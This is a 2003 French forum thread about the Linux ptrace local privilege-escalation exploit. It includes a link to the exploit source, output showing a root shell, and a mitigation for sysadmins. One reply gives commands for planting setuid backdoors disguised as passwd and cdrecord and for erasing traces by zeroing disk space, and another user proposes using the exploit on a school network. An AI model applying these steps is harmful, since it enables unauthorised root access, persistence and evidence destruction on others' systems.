Journal exploits ptrace

Posté par  .
Étiquettes : aucune
0
20
mar.
2003
je commence par le mien :)

http://sed.free.fr/ptrace.c

maintenant "ptrace exploit" sur groups.google.com
pour ceux que ça amuse.
  • # Re: exploits ptrace

    Posté par  (site web personnel) . Évalué à 1.

    Sed, y'a déjà des russes qui ont réussis à le faire avant toi depuis hier. Je sais que ça va te foutre la haine pour changer ;-)
  • # Re: exploits ptrace

    Posté par  (site web personnel) . Évalué à 0.

    je pourrai essayé ca à mon ecole, je pourrai faire le boulot de l'admin comme ça =)
    • [^] # Re: exploits ptrace

      Posté par  . Évalué à 1.

      De deux choses l'une :
      - Soit les admins savent lire un fichier de log et là c'est assez risqué
      - Soit c'est des neuneus et alors fait toi plaise !

      d'ailleur, linux loggue quoi comme action avec ce joujou ?
      • [^] # Re: exploits ptrace

        Posté par  (site web personnel) . Évalué à 2.

        Il log ca :

        Mar 20 21:55:54 bigbobwks1 kernel: request_module[net-pf-27]: waitpid(8736,...) failed, errno 1

        Et dans le shell ca donne ca :

        bigbob@bigbobwks1:~$ ./ptrace
        trying to catch 8760
        one clone created
        eip = 4000f287
        we set all up
        sh: no job control in this shell
        sh-2.05a# id
        uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
        sh-2.05a#


        A++
      • [^] # Re: exploits ptrace

        Posté par  (site web personnel) . Évalué à -1.

        si les machines sont en ext2, tu risque rien ... juste que find verifie les mise de stik bit ...

        c est plus risque sur du XFS ou autres systems journalises ...

        mais on peut contourner ... par exemple moi je fais :

        cp /bin/chown /usr/sbin/passwd
        cp /bin/chmod /usr/sbin/cdrecord
        chmod 7001 /usr/sbin/passwd /usr/sbin/cdrecord

        pour les autres users ... ce sera /usr/bin/passwd qui passera avent a cause de leur PATH ...
        et comme l admin vera un stick bit sur passwd et cdrecord, il trouvera ca normale ...

        une fois qu on a ces deux la ... c est la fete ...
        puisque ca permet de faire passer root toute autre fichier binaire ...
        c est une procedure elementaire qui permet de s auto reproduire, et de s etendre a d autres fichier ... c est comme la soupe primaire ... essentielle, mere de tout ...

        si on continues le travail dans /tmp ... on peut passer relaitvement inapercu ... en prenant soin d effacer les fichiers crees ...
        et si vous hakez un grand truc ... il faut aussi penser a effacer les anciennes versions du journal est autres inodes perdus , alors mettez vous en user et lancez un
        cat /dev/zero > /tmp/tmp
        ce qui realoura tous les inodes du disques pour la valeur 0 et effacera beaucoup de choses par la meme occasion ....

        ( ca merite bien un [+] ... )
        • [^] # Re: exploits ptrace

          Posté par  (site web personnel) . Évalué à 1.

          boh pkoi un [+] ? l'interet ici c'est plus de comprendre comment marche l'exploit, pas de jouer au script kiddie (enfin pour mon cas). j'ai testé l'exploit...il marche très bien ;) mais voila c'est tt, j'en ferais pas plus
      • [^] # Re: exploits ptrace

        Posté par  (site web personnel) . Évalué à 1.

        ah ah ... non c'est mieux que ça ici. En fait, à la base ce sont des salles windows... les comptes sont partagés par samba..l'admin fait donc un tar de ton ~..... c'est top =) mon tar fait 70Mo ;) je peux prendre un café quand je me loggue... nan pis c'est un guignol point =)
    • [^] # Re: exploits ptrace

      Posté par  . Évalué à 0.

      T'as que ça à faire ? et tes cours ... ?

      Travailler il faut.
  • # Un "contournement" possible - A l'attention des sysadmins donc.

    Posté par  . Évalué à 1.

    # echo /bla/bla > /proc/sys/kernel/modprobe

    Mais bon, ca a aussi d'autres inconvénients...

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.